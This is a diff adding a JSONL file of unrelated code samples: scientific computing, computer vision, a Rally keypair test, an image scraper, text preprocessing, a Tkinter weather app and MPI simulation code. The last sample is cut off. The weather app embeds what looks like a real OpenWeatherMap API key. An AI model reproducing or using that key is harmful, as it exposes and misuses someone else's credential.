diff --git "a/4501.jsonl" "b/4501.jsonl" new file mode 100644--- /dev/null +++ "b/4501.jsonl" @@ -0,0 +1,668 @@ +{"seq_id":"67005395","text":"from dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Iterable\n\nimport PIL.Image\nimport PIL.ImageFont\nimport edgetpu.detection.engine\n\nfrom robot_cameraman.box import Box\n\n\n@dataclass\nclass DetectionCandidate:\n label_id: int\n score: float\n bounding_box: Box\n\n\nclass DetectionEngine:\n def __init__(\n self,\n model: Path,\n confidence: float,\n max_objects: int) -> None:\n self._engine = edgetpu.detection.engine.DetectionEngine(str(model))\n self._confidence = confidence\n self._max_objects = max_objects\n\n def detect(self, image: PIL.Image.Image) -> Iterable[DetectionCandidate]:\n return map(\n lambda dc: DetectionCandidate(dc.label_id, dc.score,\n Box.from_points_iterable(\n dc.bounding_box)),\n self._engine.DetectWithImage(\n image,\n threshold=self._confidence,\n keep_aspect_ratio=True,\n relative_coord=False,\n top_k=self._max_objects))\n","sub_path":"robot_cameraman/image_detection.py","file_name":"image_detection.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"29960781","text":"# standart libs\nimport sys\nimport random\nimport copy\nimport cProfile\n\n\n# 3rd party libs\nimport pandas as pd\nimport numpy as np\nimport gempy as gp\nimport matplotlib.pyplot as plt\n\n\n# local\nimport functions.realization_setup as real_setup\nimport functions.realization_run as real_run\nimport functions.post_processing as post_pro\nimport functions.uq_runs as uq_runs\n\n\n# instantiate the geo_model\ngeo_model = gp.create_model(\"GeoModel\")\n\n# defautl data\ngeo_model = gp.init_data(\n geo_model,\n extent=[0, 1, 0, 1, 0, 1],\n resolution=[1, 1, 1]\n)\n\n# compile theno function\ngp.set_interpolation_data(\n geo_model,\n compile_theano=True,\n theano_optimizer='fast_run',\n)\n\n\n# meta\ngeo_model_extent_1 = [0,1000,0,1000,0,1000]\nsection_1 = {\n 'p1': [0, 500],\n 'p2': [1000, 500],\n 'resolution': [200, 200]\n}\n\n# sereis\nseries_df_1 = pd.DataFrame(columns=['name', 'isfault', 'order_series'])\nseries_df_1.loc[0] = { 'order_series': 0, 'name': 'Basement_Series', 'isfault': False }\nseries_df_1.loc[1] = { 'order_series': 1, 'name': 'Strat_Series', 'isfault': False }\n\n# surfaces\nsurfaces_df_1 = pd.DataFrame(columns=['name', 'serie', 'order_surface'])\nsurfaces_df_1.loc[0] = { 'name': 'basement', 'serie': 'Basement_Series', 'order_surface': 0 }\nsurfaces_df_1.loc[2] = { 'name': 'rock1', 'serie': 'Strat_Series', 'order_surface': 1 }\nsurfaces_df_1.loc[1] = { 'name': 'rock2', 'serie': 'Strat_Series', 'order_surface': 2 }\n\n# geoData\nsurface_points_input_data_1 = pd.read_csv('./data/model2_surface_points.csv')\norientaions_input_data_1 = pd.read_csv('./data/model2_orientations.csv')\n\n# Format geological_input_data\nsurface_points_original_df_1 = surface_points_input_data_1[['X', 'Y', 'Z', 'formation']]\n\n# rename colums\nsurface_points_original_df_1.columns = ['X', 'Y', 'Z', 'surface']\n\n# add distribution type and parameter\nsurface_points_original_df_1['param1'] = 10\n\n# Orientaions\norientations_original_df_1 = orientaions_input_data_1[['X', 'Y', 'Z', 'dip', 'azimuth', 'polarity', 'formation']]\n\n\n# %%timeit\n# setup model 1\nreal_setup.setup_realization(\n geo_model=geo_model,\n geo_model_extent=geo_model_extent_1,\n section=section_1,\n series_df=series_df_1,\n surfaces_df=surfaces_df_1,\n surface_points_original_df=surface_points_original_df_1,\n orientations_original_df=orientations_original_df_1\n)\n\nif real_run.check_setup_single_realization(geo_model):\n solution = gp.compute_model(model=geo_model, sort_surfaces=False)\n","sub_path":"server-gempy/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"474667314","text":"#!/usr/bin/env python\n\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Use plot.ly to visualize walkers.\")\nparser.add_argument(\"--burn\", type=int, default=0, help=\"How many samples to discard from the beginning of the chain for burn in.\")\nparser.add_argument(\"--chain\", default=\"chain.npy\", help=\"The name of the file storing the walker positions.\")\nparser.add_argument(\"--name\", default=\"hist\", help=\"The name of the object that we are fitting. The plot.ly plots will show up under this label.\")\n\nargs = parser.parse_args()\n\nimport numpy as np\n\nchain = np.load(args.chain)\n\n# Convention within the Julia EnsembleSampler is\n# ndim, niter, nwalkers = chain.shape\n# However, when written to disk, we should have been following the emcee convention\nnwalkers, niter, ndim = chain.shape\n\n# nsamples = nwalkers * niter\n# Flatchain is made after the walkers have been burned\n# flatchain = np.reshape(chain, (nsamples, ndim))\n\n\nfrom plotly import tools\nimport plotly.plotly as py\nimport plotly.graph_objs as go\n\n# First, let's try to make a single 2D contour and a single histogram\n\n\n\nfig = tools.make_subplots(rows=ndim, cols=1, shared_xaxes=True, vertical_spacing=0.005)\n\nx = np.arange(niter)\n\n# Label the axes appropriately based upon how many parameters we have\nif ndim == 10:\n labels = [r\"$M_\\ast\\quad [M_\\odot]$\", r\"$r_c$ [AU]\", r\"$T_{10}$ [K]\", r\"$q$\", r\"$\\log M_\\mathrm{gas} \\quad \\log [M_\\odot]$\", r\"$\\xi$ [km/s]\", r\"$i_d \\quad [{}^\\circ]$\", r\"PA $[{}^\\circ]$\", r\"$v_r$ [km/s]\", r\"$\\mu_\\alpha$ ['']\", r\"$\\mu_\\delta$ ['']\"]\nelif ndim == 11:\n labels = [r\"$M_\\ast\\quad [M_\\odot]$\", r\"$r_c$ [AU]\", r\"$T_{10}$ [K]\", r\"$q$\", r\"$\\log M_\\mathrm{gas} \\quad \\log [M_\\odot]$\", r\"$\\xi$ [km/s]\", r\"$d$ [pc]\", r\"$i_d \\quad [{}^\\circ]$\", r\"PA $[{}^\\circ]$\", r\"$v_r$ [km/s]\", r\"$\\mu_\\alpha$ ['']\", r\"$\\mu_\\delta$ ['']\"]\nelse:\n labels = None\n","sub_path":"scripts/plotly_hist.py","file_name":"plotly_hist.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"276354255","text":"# Copyright 2014: Rackspace UK\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\n\nfrom rally.benchmark.context import keypair\nfrom tests import test\n\nCTX = \"rally.benchmark.context\"\n\n\nclass KeyPairContextTestCase(test.TestCase):\n\n def setUp(self):\n super(KeyPairContextTestCase, self).setUp()\n self.users = 2\n task = mock.MagicMock()\n self.ctx_with_keys = {\n \"users\": [\n {\"keypair\": \"key\", \"endpoint\": \"endpoint\"},\n ] * self.users,\n \"task\": task\n }\n self.ctx_without_keys = {\n \"users\": [{'endpoint': 'endpoint'}] * self.users,\n \"task\": task\n }\n\n @mock.patch(\"%s.keypair.Keypair._generate_keypair\" % CTX)\n def test_keypair_setup(self, mock_generate):\n mock_generate.return_value = \"key\"\n keypair_ctx = keypair.Keypair(self.ctx_without_keys)\n keypair_ctx.setup()\n self.assertEqual(self.ctx_without_keys, self.ctx_with_keys)\n\n @mock.patch('rally.osclients.Clients')\n @mock.patch(\"%s.keypair.Keypair._keypair_safe_remove\" % CTX)\n def test_keypair_cleanup(self, mock_safe_remove, mock_osclients):\n keypair_ctx = keypair.Keypair(self.ctx_with_keys)\n keypair_ctx.cleanup()\n mock_clients = mock_osclients.return_value\n mock_nova = mock_clients.nova.return_value\n self.assertEqual(\n [mock.call(mock_nova)]\n * self.users,\n mock_safe_remove.mock_calls\n )\n\n @mock.patch(\"%s.keypair.Keypair._keypair_safe_remove\" % CTX)\n @mock.patch('rally.osclients.Clients')\n def test_keypair_generate(self, mock_osclients, mock_safe_remove):\n keypair_ctx = keypair.Keypair(self.ctx_without_keys)\n keypair_ctx._generate_keypair('endpoint')\n mock_clients = mock_osclients.return_value\n mock_nova = mock_clients.nova.return_value\n self.assertIn(\n mock.call().nova().keypairs.create('rally_ssh_key'),\n mock_osclients.mock_calls\n )\n mock_safe_remove.assert_called_once_with(mock_nova)\n\n def test_keypair_safe_remove(self):\n mock_nova = mock.MagicMock()\n keypair_ctx = keypair.Keypair(self.ctx_without_keys)\n keypair_ctx._keypair_safe_remove(mock_nova)\n self.assertEqual(\n [mock.call.delete('rally_ssh_key')],\n mock_nova.keypairs.mock_calls)\n","sub_path":"tests/benchmark/context/test_keypair.py","file_name":"test_keypair.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343363167","text":"import requests\nimport sys\nimport lxml.html\nimport urllib.parse as parse\nimport posixpath\nimport os\n\nr = requests.get('http://www.jpl.nasa.gov/spaceimages/') \nparsed= lxml.html.fromstring(r.text)\nimages = parsed.xpath('//img/@src')\n#xpath for high res images below\n#images = parsed.xpath('//*[contains(@class, \"fancybox\")]/@data-fancybox-href')\n\nif not images:\n sys.exit(\"found no pictures\")\nimages = [parse.urljoin(r.url, url) for url in images if 'wallpaper' in url]\nprint (images)\n\nprint ('found %s pictures' % len(images))\n\nfor url in images:\n path = parse.urlsplit(url).path\n filename = posixpath.basename(path)\n if not os.path.exists(filename):\n print (\"downloading {} to {}\".format(url, filename))\n r = requests.get(url)\n with open(filename, 'wb') as image:\n image.write(r.content)\n else:\n print (\"Skpping {}, already exists\".format(filename))\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"470359578","text":"__author__ = 'liuwei'\n\nimport nltk\nimport pandas as pd \nimport numpy as np \nimport re \n\nfrom bs4 import BeautifulSoup\nfrom nltk.corpus import stopwords\n\nclass Common(object):\n '''the common operator for the review'''\n\n @staticmethod\n def get_clean_review(review):\n '''remove some useless charactor'''\n\n #1.remove html makeup, such as ,

,
\n review_text = BeautifulSoup(review, 'html.parser').get_text()\n\n\n #2. remove non-letters\n review_text = re.sub(\"[^a-zA-Z]\", \" \", review_text)\n\n #3. all to lower\n review_text = review_text.lower()\n\n return review_text\n\n\n @staticmethod\n def review_to_wordlist(review, remove_stopwords=False):\n '''transform the review to a word list'''\n\n review_text = Common.get_clean_review(review)\n\n words = review_text.split()\n \n #remove the word in stopwords list\n if remove_stopwords:\n stops = set(stopwords.words(\"english\"))\n words = [w for w in words if not w in stops]\n\n return words\n\n\n @staticmethod\n def review_to_sentences(review, tokenizer, remove_stopwords=False):\n '''transform the review to sentences'''\n\n #1. use the NLTK tokenizer to split the paragraph into sentences, the split punction may be '.' or '!' or '?' and so on\n raw_sentences = tokenizer.tokenize(review.strip())\n \n #2. loop over each sentence\n sentences = []\n for raw_sentence in raw_sentences:\n if len(raw_sentence) > 0:\n sentences.append(Common.review_to_wordlist(raw_sentence, remove_stopwords))\n\n\n return sentences\n\n\n","sub_path":"Common.py","file_name":"Common.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"588405670","text":"\n#!/usr/bin/env python3\n\n# Created by Marwan Mashaly\n# Created on December 2019\n# This program fFinds the weather of a certain city\n\nimport pyowm\nfrom tkinter import * \nfrom tkinter.ttk import *\nfrom PIL import ImageTk,Image\n\nroot = Tk() \nroot.title('Weather')\nroot.configure(background = \"sky blue\")\n#root.geometry(\"320x480\")\n\n#opening images getting them ready\nimg = Image.open(r'/home/pi/Downloads/sno3.png') \n\n# Styling the label widget\n\nlabel = Label(root, text = \"Weather\", font = ('calibri', 25, 'bold'), foreground = 'yellow', background = 'sky blue')\nlabel2 = Label(root, text = \"Clouds :\", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel3 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel4 = Label(root, text = \"Rain : \", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel5 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel6 = Label(root, text = \"snow :\", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel7 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel8 = Label(root, text = \"fog :\",font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel9 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel10 = Label(root, text = \"Temprature in Celsius :\", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel11 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel12 = Label(root, text = \"weather details\", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel13 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel14 = Label(root, text = \"Wind Speed\", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel15 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel16 = Label(root, text = \"Cloud coverage (in percent) :\", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel17 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\n#label18 = Label(root, text = \"Sun: \", font = ('calibri', 16), foreground = 'white', background = 'black')\n#label19 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'black')\nlabel20 = Label(root, text = \"location : \", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel21 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\n\n#label.pack(anchor = 'center')\nlabel.grid(row = 1, column = 0)\nlabel2.grid(row = 5, column = 0)\nlabel3.grid(row = 5, column = 2)\nlabel4.grid(row = 6, column = 0)\nlabel5.grid(row = 6, column = 2)\nlabel6.grid(row = 7, column = 0)\nlabel7.grid(row = 7, column = 2)\nlabel8.grid(row = 8, column = 0)\nlabel9.grid(row = 8, column = 2)\nlabel10.grid(row = 9, column = 0)\nlabel11.grid(row = 9, column = 2)\nlabel12.grid(row = 10, column = 0)\nlabel13.grid(row = 10, column = 2)\nlabel14.grid(row = 11, column = 0)\nlabel15.grid(row = 11, column = 2)\nlabel16.grid(row = 12, column = 0)\nlabel17.grid(row = 12, column = 2)\n#label18.grid(row = 13, column = 0)\n#label19.grid(row = 13, column = 2)\nlabel20.grid(row = 13, column = 0)\nlabel21.grid(row = 13, column = 2)\n#label.grid(row = 5, column = 1)\n\n\n# adding an image to tkinter\n#canvas=Canvas(root,width=300,height=480)\n#image=ImageTk.PhotoImage(Image.open(\"C:\\\\Users\\\\marwa\\\\OneDrive\\\\Pictures\\\\cloudy.gif\"))\n#label = Label(image=image)\n\n#label.grid(row = 14, column = 2)\n\n\ndef main():\n # This\n\n owm = pyowm.OWM('3a65677897148889d39423a3ce8e1716') # You MUST provide a valid API key\n ottawa = owm.three_hours_forecast('Ottawa, Canada')\n \n loc = \"Ottawa\"\n label21.config(text = loc)\n\n clouds = ottawa.will_have_clouds()\n fog = ottawa.will_have_fog()\n rain = ottawa.will_have_rain()\n snow = ottawa.will_have_snow()\n\n #if clouds == 1:\n # img = Image.open(r'C:\\\\Users\\\\marwa\\\\Downloads\\\\clearSky.jpg') \n # tkimage = ImageTk.PhotoImage(img)\n # img = img.resize((250, 250), Image.ANTIALIAS)\n #tkimage.geometry(\"120x80\")\n #Label(root, image=tkimage, text=\" There is clouds today\").grid(row = 5, column = 2) # Put it in the display window\n # else:\n # img = Image.open(r'C:\\\\Users\\\\marwa\\\\Downloads\\\\clearSky.jpg') \n # tkimage = ImageTk.PhotoImage(img)\n # img = img.resize((250, 250), Image.ANTIALIAS)\n #tkimage.geometry(\"120x80\")\n # Label(root, image=tkimage, text=\" There is no clouds today\").grid(row = 5, column = 2) # Put it in the display window\n\n if rain == 1:\n rain = \"there is rain today\"\n else:\n rain = \"there is no rain today\"\n if snow == 1:\n snow = \"there is snow today\"\n else:\n snow = \"there is no snow today\"\n if fog == 1:\n fog = \"there is fog today\"\n else:\n fog = \"there is no fog today\"\n if clouds == 1:\n clouds = \"there is clouds today \"\n else:\n clouds = \"there is no clouds today\"\n\n label3.config(text = clouds)\n label5.config(text = rain)\n label7.config(text = snow)\n label9.config(text = fog)\n # label19.config(text = sun)\n \n ott = owm.weather_at_place('Ottawa, Canada')\n weather = ott.get_weather()\n temp = weather.get_temperature('celsius')['temp']\n temp = round(temp)\n label11.config(text = temp)\n\n description = weather.get_detailed_status()\n label13.config(text = description)\n\n wind = weather.get_wind()\n label15.config(text = wind)\n\n cloud_cov = weather.get_clouds() \n label17.config(text = cloud_cov)\n\n\nif __name__ == \"__main__\":\n main()\n\nroot.mainloop()\n\n","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507101807","text":"# Functions for Discontinuous Galerkin Method\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.interpolate import *\nfrom ReferenceElement import *\nimport os\nimport imageio\n\n# Range Kutta 4 \n# This is Tstepper for Evolve\n# F is the derivative\ndef RK4_Step(dt, F,u, K, N,t,a,alpha, M_inv, M_inv_S, g = None,v= None, potential = None,un = None):\n w1 = F(u , K, N, t ,a, alpha, M_inv, M_inv_S, g,v,potential)\n w2 = F(u + 0.5*dt*w1, K, N, t + 0.5*dt,a, alpha, M_inv, M_inv_S, g,v,potential)\n w3 = F(u + 0.5*dt*w2, K, N, t + 0.5*dt,a, alpha, M_inv, M_inv_S, g,v,potential)\n w4 = F(u + dt*w3 , K, N, t + dt ,a, alpha, M_inv, M_inv_S, g,v,potential)\n next_u = u + dt/6*(w1+2*w2+2*w3+w4)\n return next_u\n\n# Get optimal LGL spatial grid-points for Discontinuous Galerkin method\n# Return an array of K arrays of grid-points, one for each element D_k\n# Parameter reference_interval is the first output of ReferenceElement(N), \n# which returns LGL collocation points on reference interval [-1,1] to be mapped to our real interval [start,end]\n\ndef get_x_elements(start, end, K, reference_interval): #LGL points\n h = (end-start)/K #Element width\n x_elements = []\n for k in range(K):\n element = []\n for r_i in reference_interval:\n element.append(start + k*h+(r_i+1)/2*h)\n x_elements.append(element)\n return np.asarray(x_elements)\n\n#Get smallest spatial spacing dxmin in a DG scheme with LGL points\n#Output used with Courant factor to calculate suitable size for time step dt \n\ndef get_dx_min(x_elements):\n a = x_elements[0]\n dxarray = np.empty_like(a)\n for i in range(len(a)):\n dxarray[i] = np.abs(a[i]-a[(i+1)%len(a)])\n return np.min(dxarray)\n\n\n# Calculate time derivative for each element D_k\n# M_inv_S is the 3rd output of ReferenceElement.py --> ReferenceElement(N)[2], after being scaled\n# by multiplying with 2/h, where 2 come from reference interval interval [-1,1], h is the real width of each element)\n\ndef Evolve(t_initial, t_final, Tstepper, F,CF, start, end, initial_value_function, K, N,a,alpha,g= None):\n h = (end-start)/K\n\n reference_element = ReferenceElement(N)\n reference_interval = reference_element[0]\n M_inv = reference_element[1]*2/h\n M_inv_S = reference_element[2]*2/h\n\n x = get_x_elements(start,end, K, reference_interval)\n u = initial_value_function(x,t_initial)\n\n dx_min = get_dx_min(x)\n dt = CF*dx_min\n nt = int((t_final - t_initial)/dt) #number of time steps to be evolved \n\n t = t_initial\n\n for n in range(nt):\n\n u = RK4_Step(dt,F,u, K,N,t,a,alpha,M_inv, M_inv_S,g)\n t = t + dt\n \n return t, u, x\n \n# Radiative boundary conditions\ndef f_star_at_x_k_radiative(u,k,K,N,t,a,alpha): \n u_braces = (u[(k-1)%K][N] + u[(k)%K][0])/2 #average \n u_brackets = u[(k-1)%K][N] - u[(k)%K][0] #difference\n \n \"\"\"if a>0:\n #if k == 0:\n # u_braces = u[k][0]/2\n # u_brackets = -u[k][0]\n if k == K:\n u_braces = u[-1][-1]/2\n u_brackets = -u[-1][-1]\n else:\n if k == K:\n u_braces = u[-1][-1]/2\n u_brackets = -u[-1][-1]\n if k == 0:\n u_braces = u[k][0]/2\n u_brackets = -u[k][0]\"\"\"\n\n f_star = a*u_braces + np.abs(a)*(1-alpha)/2*u_brackets\n \n \n ###testing May 29\n if a > 0:\n if k == 0:\n f_star = 0\n #if k == K:\n # f_star = 0\n else: \n #if k == K:\n # f_star = -2*np.pi*np.cos(2*np.pi*(1+t))\n if k == 0:\n f_star = -2*np.pi*np.cos(2*np.pi*t)\n \n \n return f_star \n\ndef du_dt_element_k_radiative(u,k, K, N,t,a,alpha, M_inv, M_inv_S, delta_source = None,un = None):\n first_term = -a*np.matmul( M_inv_S , u[k])\n second_term = M_inv[:,N] * (a*u[k][-1] - f_star_at_x_k_radiative(u,k+1,K,N,t,a,alpha)) #information from element on the right\n third_term = -M_inv[:,0] * (a*u[k][0] - f_star_at_x_k_radiative(u,k ,K,N,t,a,alpha)) #information from element on the left\n \n du_dt_element = first_term + second_term + third_term\n \n if a > 0: \n a=a\n if k == K-1:\n du_dt_element = first_term + third_term \n #if k == 0:\n # du_dt_element = first_term + second_term\n else:\n if k == 0:\n du_dt_element = first_term + second_term\n if k == K-1:\n try:\n second_term = M_inv[:,N] * (a*u[k][-1] - np.matmul(M_inv_S, un[-1])[-1])\n du_dt_element = first_term + second_term + third_term\n except TypeError:\n pass\n #if k == K-1:\n # du_dt_element = first_term + third_term \n \n\n return du_dt_element\n\ndef DG_du_dt_radiative(u, K, N,t,a,alpha, M_inv, M_inv_S,delta_source = None, v = None, potential = None,un = None):\n du_dt_elements = np.empty_like(u)\n for k in range(K):\n du_dt_elements[k] = du_dt_element_k_radiative(u,k, K, N,t,a,alpha, M_inv, M_inv_S,delta_source)\n \n try:\n return du_dt_elements + v + potential\n except TypeError:\n try:\n return du_dt_elements + v\n except TypeError:\n try:\n return du_dt_elements + potential\n except TypeError:\n return du_dt_elements\n\n\n\ndef interpolated_plot(u_elements,x_elements, nx_element):\n interpolated_u = np.empty((len(u_elements), nx_element))\n smooth_x = np.empty_like(interpolated_u)\n\n for i in range(len(u_elements)):\n smooth_x_element = np.linspace(x_elements[i][0],x_elements[i][-1],nx_element,True)\n interpolated_u_element = lagrange(x_elements[i],u_elements[i])(smooth_x_element)\n\n smooth_x[i] = smooth_x_element\n interpolated_u[i] = interpolated_u_element\n \n #plotting\n plt.plot(smooth_x_element,interpolated_u_element) # interpolated lagrange polynomials\n plt.scatter(x_elements[i],u_elements[i]) # nodal points\n ","sub_path":"5_30_reflecting_testing_2/DG_functions_wave_testing.py","file_name":"DG_functions_wave_testing.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140449524","text":"import cv2\nimport numpy as np\nimport imutils\n\nclass DetectionOpenCV():\n def __init__(self, _SizeMax = 5000, _SizeMin = 900, _ResizeWidth = 620, _ResizeHeight = 480, _CannyThreshold1 = 30, _CannyThreshold2 = 200):\n self.sizeMax = _SizeMax # Kích thước ước lượng biển số lớn nhất trong ảnh\n self.sizeMin = _SizeMin # Kích thước ước lượng biển số nhỏ nhất trong ảnh\n self.resizeWidth = _ResizeWidth # Chiều rộng resize ảnh\n self.resizeHeight = _ResizeHeight # Chiều rộng resize ảnh\n self.cannyThreshold1 = _CannyThreshold1 # Ngưỡng 1 phát hiện cạnh biên canny\n self.cannyThreshold2 = _CannyThreshold2 # Ngưỡng 2 phát hiện cạnh biên canny\n \n def detection(self, _ImgInput):\n # Param\n max_size = self.sizeMax\n min_size = self.sizeMin\n\n # Resize image\n img = cv2.resize(_ImgInput, (self.resizeWidth, self.resizeHeight))\n\n # Edge detection\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # convert to grey scale\n gray = cv2.bilateralFilter(gray, 11, 17, 17) # Blur to reduce noise\n edged = cv2.Canny(gray, self.cannyThreshold1, self.cannyThreshold2) # Perform Edge detection\n\n # Find contours in the edged image, keep only the largest ones, and initialize our screen contour\n cnts = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n cnts = sorted(cnts, key=cv2.contourArea, reverse=True)\n screenCnt = None\n\n # Loop over our contours\n for c in cnts:\n # approximate the contour\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.05 * peri, True)\n\n # if our approximated contour has four points, then\n # we can assume that we have found our screen\n if len(approx) == 4 and max_size > cv2.contourArea(c) > min_size:\n screenCnt = approx\n break\n\n img_plate = np.array([]) \n if screenCnt is None:\n detected = 0\n return 0, img_plate\n else:\n detected = 1\n\n if detected == 1:\n cv2.drawContours(img, [screenCnt], -1, (0, 255, 0), 3)\n\n # Masking the part other than the number plate\n mask = np.zeros(gray.shape, np.uint8)\n new_image = cv2.drawContours(mask, [screenCnt], 0, 255, -1, )\n new_image = cv2.bitwise_and(img, img, mask=mask)\n\n # Now crop\n (x, y) = np.where(mask == 255)\n (topx, topy) = (np.min(x), np.min(y))\n (bottomx, bottomy) = (np.max(x), np.max(y))\n img_plate = gray[topx:bottomx + 1, topy:bottomy + 1]\n return 1, img_plate","sub_path":"DetectionOpenCV.py","file_name":"DetectionOpenCV.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86716401","text":"__author__ = 'Jennifer'\n\nimport argparse\n\ndescrp = 'Reads in two .gro files and outputs single .gro'\n\nparser = argparse.ArgumentParser(description=descrp)\n\nparser.add_argument('-f1', help='First input gro')\nparser.add_argument('-f2', help='Second input gro')\nparser.add_argument('-o', help='Output gro')\nparser.add_argument('-head', help='Header for output gro')\nparser.add_argument('-v', action='store_true', help=\n 'Verbose')\nparser.add_argument('-b', help='Box size (e.g. \\'5 5 5\\'). '\n 'Default is box size of second '\n 'gro file.')\n\nargs = parser.parse_args()\n\ngrofilename1 = args.f1\ngrofilename2 = args.f2\noutfilename = args.o\nheader = args.head\n\ngrofile1 = open(grofilename1, 'r')\ngrofile2 = open(grofilename2, 'r')\ngroarray = []\n\nnumlines1 = 0\nnumlines2 = 0\nnumlines = 0\nnumatom1 = 0\nnumatom2 = 0\n\n''' First two lines in gro file are header and number\n of atoms. Don't care about headers, just the num\n of atoms.'''\nwhile numlines < 2:\n newline1 = grofile1.readline()\n newline2 = grofile2.readline()\n if numlines == 1:\n numatom1 = int(newline1)\n numatom2 = int(newline2)\n numlines += 1\n\n''' Read in first gro file atoms '''\nwhile 1:\n if numlines1 >= numatom1:\n break\n newline1 = grofile1.readline()\n groarray.append(newline1)\n numlines1 += 1\n\n''' Read in second gro file atoms '''\nwhile 1:\n if numlines2 >= numatom2:\n break\n newline2 = grofile2.readline()\n groarray.append(newline2)\n numlines2 += 1\n\noutfile = open(outfilename, 'w')\noutfile.write(header + '\\n')\noutfile.write(str(numatom1 + numatom2) + '\\n')\nfor x in groarray:\n outfile.write(x)\n\n# The last line in the files is the box size\nif args.b == None:\n outfile.write(grofile2.readline())\nelse:\n outfile.write(args.b)\n\n\n","sub_path":"mergegro.py","file_name":"mergegro.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365844813","text":"from mpi4py import MPI \nimport numpy as np\nimport time\nimport scipy.stats as sts\nfrom scipy.optimize import minimize\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\ndef simulation(rho):\n mu = 3.0 \n sigma = 1.0 \n z_0 = mu\n\n # Set simulation parameters, draw all idiosyncratic random shocks, \n # # and create empty containers \n S = int(1000/size) # Set the number of lives to simulate \n T = int(4160) # Set the number of periods for each simulation \n np.random.seed(25)\n eps_mat = sts.norm.rvs(loc=0, scale=sigma, size=(T, S)) \n z_mat = np.zeros((T, S)) \n z_mat[0, :] = z_0\n\n tracker = np.array([])\n for s_ind in range(S): \n z_tm1 = z_0 \n for t_ind in range(T): \n e_t = eps_mat[t_ind, s_ind] \n z_t = rho * z_tm1 + (1 - rho) * mu + e_t \n if z_t <= 0:\n tracker = np.append(tracker, t_ind)\n break\n else:\n z_tm1 = z_t\n \n tracker_all = None\n if rank == 0:\n tracker_all = np.empty([S*size], dtype='float')\n comm.Gather(sendbuf = tracker, recvbuf = tracker_all, root=0)\n\n return -tracker_all.mean()\n\ndef main():\n\n t0 = time.time()\n x0 = [0.1]\n res = minimize(simulation, x0, method='Nelder-Mead')\n time_elapsed = time.time() - t0\n print('Optimized rho: {}'.format(res.x[0]))\n print('Max Value: {}'.format(res.fun))\n print('Time taken: {}'.format(time_elapsed))\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"q4_mpi.py","file_name":"q4_mpi.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"604447293","text":"from core.processor import Processor\n\n\nclass FIND_THEN_COLLECTProcessor(Processor):\n TPL: str = '{\"collectby\":\"id|xpath|css\",\"identity\":\"\",\"value_type\":\"text|value|any\", \"value_key\":\"name_of_collect\"}'\n\n def process(self):\n\n chrome = self.get_data_by_param_default_data('chrome_name', 'chrome')\n\n collectby = self.get_param('collectby')\n value_type = 